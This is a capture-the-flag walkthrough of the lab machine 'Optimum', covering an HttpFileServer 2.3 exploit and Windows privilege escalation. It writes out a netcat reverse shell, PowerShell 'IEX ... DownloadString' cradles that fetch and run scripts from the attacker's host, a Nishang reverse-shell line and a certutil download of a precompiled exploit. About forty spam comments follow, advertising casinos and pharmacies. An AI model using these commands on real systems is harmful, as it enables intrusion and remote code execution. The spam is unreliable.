Optimum

Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.

nMap

As always, we’ll start here with our standard nMap scan: nmap -A -p – 10.10.10.8

Not much open other than Port 80, which appears to be running HttpFileServer 2.3. Let’s start our GoBuster scan before we bring up our browser and check it out: gobuster dir -u http://10.10.10.8 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Now, let’s open up our browser and check out the site: http://10.10.10.8

Not a whole lot to work with right here at the moment, so let’s see if we can find anything regarding HttpFileServer 2.3 with Dr. Google.

Vulnerability Discovery

And the first link brings us to a Remote Code Execution (RCE) vulnerability https://www.exploit-db.com/exploits/39161

Let’s download it with wget https://www.exploit-db.com/raw/39161 re-name it, and then make it executable.

Let’s open up the script in your editor of choice, and when we do that, we notice a few things on it’s operation:

I changed the ip_addr and local_port variable to my Kali box and the port I’ll be listening on with NetCat.

And we also need to get nc.exe into our working directory and our Simple HTTP Python server started up.

Start up a NetCat listener:

And then run the script: python 39161.py 10.10.10.8 80 then check your listener.

And the user.txt flag is in the directory we’re already in.

Priv Esc – Windows Exploit Suggester

We’ll start with Windows Exploit Suggester. If you don’t already have it downloaded do that, and then update it with the following command: python windows-exploit-suggester.py –update

Next, we need to copy systeminfo from our target machine and put the contents into a file on our Kali box.

Now, we’ll use Windows Exploit Suggester to compare the list of Microsoft updates with our systeminfo file: ../Security_Repos/Windows-Exploit-Suggester/windows-exploit-suggester.py –database ../Security_Repos/Windows-Exploit-Suggester/2020-09-22-mssb.xls –systeminfo systeminfo

And there’s a few here to go through. Two stand out right away:

Let’s try them one by one.

MS16-135 – didn’t work

If we follow the link to the first Privilege Escalation exploit we’re brought to an ExploitDB page: https://www.exploit-db.com/exploits/41015/

This exploit is some C code that I haven’t jacked with much. So let’s try it. Let’s download the exploit and then copy it to our working directory. It’s called 41015.c

After downloading the code, let’s try to get it compiled for windows. We can use mingw to do this with the following command: x86_64-w64-mingw32-gcc 41015.c -o exploit.exe Here’s a link on how to compile exploits in Kali.

And I got a compile error. So a little more Googling will bring you to a PowerShell equivalent: https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16135.ps1

So let’s use wget to pull it down to our Kali box. Next, the way this script works is that it will execute a script of our choosing with admin privs, so we need a script that will give us a reverse shell when executed. Knowing that PowerShell is on this box, let’s use Invoke-PowerShellTcp.ps1 from Nishang.

Download it and add this line to the end of it: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.20 -Port 1234

Make sure it’s in the same folder you’re running your Python HTTP Server from. Next, we want to update the Invoke-MS16135.ps1 script to execute our InvokePowerShellTcp.ps1 script when it runs. So let’s open up Invoke-MS16135.ps1 and add this line to the bottom: Invoke-MS16135 -Command “iex(New-Object Net.WebClient).DownloadString(‘http://10.10.14.20/Invoke-PowerShellTcp.ps1’)”

Now, let’s try to execute it. From the Windows machine run this: Powershell “IEX(new-object net.webclient).downloadstring(‘http://10.10.14.20/Invoke-MS16135.ps1’)”

Hrm…well we’re on a 64 bit box. So let’s try to run it with the 64 bit version of PowerShell: %SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe “IEX(new-object net.webclient).downloadstring(‘http://10.10.14.20/Invoke-MS16135.ps1’)”

And nothing. I noticed on my HTTP Server window tab that it didn’t even try to download the Invoke-PowerShellTcp.ps1 file. So, let’s try another exploit.

MS16-075 – didn’t work

System Info and Windows Exploit Suggester said this might be exploitable. However, two things stopped me from trying this. One, for the Potato attacks to work the SeImpersonate token needs to be enabled, and it’s not on this box:

Second, when I started watching the video for the Hot Potato it said you might have to wait 24 hours for it to work…and I don’t have that kinda time.

MS16-098

Let’s check out the page for this exploit: https://www.exploit-db.com/exploits/41020

This too appears to be some code in C but there’s some links to some pre-compiled versions of it in the comments of the code:

So let’s grab the file: wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

Now, let’s use CertUtil to copy it over to our Windows machine. From our Windows shell, type certutil.exe -urlcache -split -f http://10.10.14.20/41020.exe

Then run it:

Done! You can get the root flag from here.

98 thoughts on “Optimum”

  1. I’ve been exploring for a little bit for any high-quality articles or weblog posts on this kind of space . Exploring in Yahoo I at last stumbled upon this web site. Reading this info So i’m satisfied to exhibit that I have a very excellent uncanny feeling I discovered just what I needed. I such a lot indisputably will make certain to don’t put out of your mind this site and provides it a glance regularly.

  2. Este site é realmente incrível. Sempre que consigo acessar eu encontro novidades Você também pode acessar o nosso site e descobrir mais detalhes! Conteúdo exclusivo. Venha descobrir mais agora! 🙂

  3. Adorei este site. Para saber mais detalhes acesse o site e descubra mais. Todas as informações contidas são informações relevantes e únicos. Tudo que você precisa saber está ta lá.

  4. Este site é realmente fantástico. Sempre que consigo acessar eu encontro coisas incríveis Você também vai querer acessar o nosso site e descobrir detalhes! Conteúdo exclusivo. Venha saber mais agora! 🙂

  5. amei este site. Para saber mais detalhes acesse o site e descubra mais. Todas as informações contidas são conteúdos relevantes e diferentes. Tudo que você precisa saber está ta lá.

  6. Wonderful work! This is the type of info that should be shared around the internet. Shame on the search engines for not positioning this post higher! Come on over and visit my web site . Thanks =)

  7. I have recently started a site, the info you provide on this site has helped me tremendously. Thank you for all of your time & work. “Quit worrying about your health. It’ll go away.” by Robert Orben.

  8. Wonderful website. A lot of useful info here. I’m sending it to several friends ans also sharing in delicious. And naturally, thanks for your effort!

  9. Write more, thats all I have to say. Literally, it seems as though you relied on the video to make your point. You definitely know what youre talking about, why throw away your intelligence on just posting videos to your weblog when you could be giving us something enlightening to read?

  10. There are actually loads of particulars like that to take into consideration. That could be a nice point to deliver up. I provide the ideas above as normal inspiration but clearly there are questions just like the one you bring up where crucial factor might be working in honest good faith. I don?t know if best practices have emerged round things like that, but I am sure that your job is clearly identified as a good game. Both girls and boys really feel the influence of just a moment’s pleasure, for the remainder of their lives.

  11. Some genuinely nice and useful info on this internet site, also I conceive the design and style holds good features.

  12. I’m truly enjoying the design and layout of your website. It’s a very easy on the eyes which makes it much more pleasant for me to come here and visit more often. Did you hire out a designer to create your theme? Outstanding work!

  13. Magnificent website. Lots of useful info here. I am sending it to some friends ans also sharing in delicious. And naturally, thanks to your effort!

  14. Heya! I just wanted to ask if you ever have any trouble with hackers? My last blog (wordpress) was hacked and I ended up losing several weeks of hard work due to no backup. Do you have any methods to prevent hackers?

  15. Do you mind if I quote a couple of your posts as long as I provide credit and sources back to your website? My website is in the exact same niche as yours and my users would really benefit from some of the information you provide here. Please let me know if this ok with you. Thanks a lot!

  16. Hello, Neat post. There is a problem together with your web site in web explorer, may test thisK IE nonetheless is the marketplace chief and a good element of other folks will leave out your great writing due to this problem.

  17. I just couldn’t leave your website before suggesting that I actually loved the usual info an individual supply in your visitors? Is going to be back often to check up on new posts.

  18. Good web site! I truly love how it is simple on my eyes and the data are well written. I am wondering how I might be notified when a new post has been made. I have subscribed to your feed which must do the trick! Have a great day!

  19. I have not checked in here for some time because I thought it was getting boring, but the last several posts are good quality so I guess I will add you back to my everyday bloglist. You deserve it my friend 🙂

  20. After study a few of the blog posts on your website now, and I truly like your way of blogging. I bookmarked it to my bookmark website list and will be checking back soon. Pls check out my web site as well and let me know what you think.

  21. I just could not go away your web site before suggesting that I extremely loved the standard information a person provide on your visitors? Is gonna be again frequently to check up on new posts

  22. Hmm it looks like your site ate my first comment (it was super long) so I guess I’ll just sum it up what I had written and say, I’m thoroughly enjoying your blog. I as well am an aspiring blog blogger but I’m still new to everything. Do you have any points for inexperienced blog writers? I’d genuinely appreciate it.

  23. It’s appropriate time to make some plans for the long run and it’s time to be happy. I’ve read this publish and if I could I wish to counsel you few attention-grabbing things or advice. Perhaps you could write subsequent articles relating to this article. I want to learn even more things about it!

  24. Undeniably believe that which you stated. Your favorite reason seemed to be on the internet the easiest thing to be aware of. I say to you, I certainly get irked while people consider worries that they plainly don’t know about. You managed to hit the nail upon the top as well as defined out the whole thing without having side effect , people could take a signal. Will likely be back to get more. Thanks

  25. I simply couldn’t depart your web site prior to suggesting that I really loved the usual info an individual supply in your guests? Is gonna be back frequently to check out new posts.

  26. I loved up to you will obtain carried out right here. The caricature is attractive, your authored subject matter stylish. nonetheless, you command get bought an shakiness over that you want be handing over the following. ill indubitably come further in the past once more as precisely the same just about a lot steadily inside case you protect this increase.

  27. Wow, incredible blog format! How long have you been running a blog for? you make blogging look easy. The entire glance of your website is excellent, let alone the content!

  28. Pretty section of content. I just stumbled upon your weblog and in accession capital to assert that I get actually enjoyed account your blog posts. Anyway I will be subscribing to your feeds and even I achievement you access consistently fast.

  29. I think this is among the most vital information for me. And i am glad reading your article. But wanna remark on some general things, The site style is ideal, the articles is really great : D. Good job, cheers

  30. Woah! I’m really loving the template/theme of this blog. It’s simple, yet effective. A lot of times it’s very hard to get that “perfect balance” between usability and visual appearance. I must say that you’ve done a very good job with this. Additionally, the blog loads extremely fast for me on Firefox. Superb Blog!

  31. Zeus doesn’t play small in zeus55. Multipliers grow wildly during tumbles and become truly terrifying in free spins. Join the pantheon — spin Gates of Olympus!

  32. La pharmacie en ligne qui respecte votre intimite. Ordonnances 100 % dematerialisees acceptees. Livraison rapide et fiable depuis 2019. MediPrivacy – sante sereine.zyloprim

  33. Tout pour la future maman et son bebe est reuni sur notre site. De la conception aux premiers mois, suivez nos guides d’achat. Articles de puericulture et soins specifiques livres sans stress. Vivez la maternite en toute serenite.danazol

  34. Upon the millions friendly momentous on fan maxxwins – the #1 legitimate in dough casino app in America.
    Get your $1000 TEASE IT AGAIN hand-out and turn every spin, хэнд and somersault into real banknotes rewards.
    Firm payouts, gigantic jackpots, and non-stop fight – download FanDuel Casino now and start playing like a pro today!

  35. Connect the millions delightful momentous on fan maxxwins – the #1 legitimate money casino app in America.
    Pick up your $1000 OPERATE IT AGAIN honorarium and modify every spin, хэнд and rolling into legitimate cash rewards.
    Permanent =’pretty damned quick’ payouts, immense jackpots, and habitual activity – download FanDuel Casino in these times and start playing like a pro today!

  36. FanDuel Casino is America’s #1 online casino, delivering non-stop thrills with ignition casino welcome bonus , exclusive slots like Huff N’ Word, and live retailer undertaking normal at your fingertips. Brand-new players get 500 Hand-out Spins supplementary $40 in Casino Bonus upstanding suited for depositing $10—plus up to $1,000 back on first-day closing losses. Province all Thrillionaires: join now, vie with your nature, and upon every blink into epic wins!

  37. FanDuel Casino is America’s #1 online casino, delivering unhesitating thrills with ignition game , upper-class slots like Huff N’ Word, and spend dealer force normal at your fingertips. Brand-new players get 500 Hand-out Spins plus $40 in Casino Perk exactly for the purpose depositing $10—with the addition of up to $1,000 dorsum behind on first-day screen losses. Province all Thrillionaires: join now, operate your nature, and turn every blink into epic wins!

  38. Betano Casino https://betanogame.org/ – home of massive jackpots. Claim your €500 welcome bonus today and explore thousands of exciting titles. Live casino, sports betting and more await you. Become a legend with every bet.

  39. Thanks for the marvelous posting! I quite enjoyed reading it, you may be a great author.I will make sure to bookmark your blog and will eventually come back sometime soon. I want to encourage one to continue your great work, have a nice evening!

  40. Hi there I am so glad I found your website, I really found you by accident, while I was searching on Aol for something else, Anyhow I am here now and would just like to say kudos for a marvelous post and a all round thrilling blog (I also love the theme/design), I don’t have time to read through it all at the minute but I have book-marked it and also added your RSS feeds, so when I have time I will be back to read much more, Please do keep up the fantastic work.

Leave a Reply

Your email address will not be published. Required fields are marked *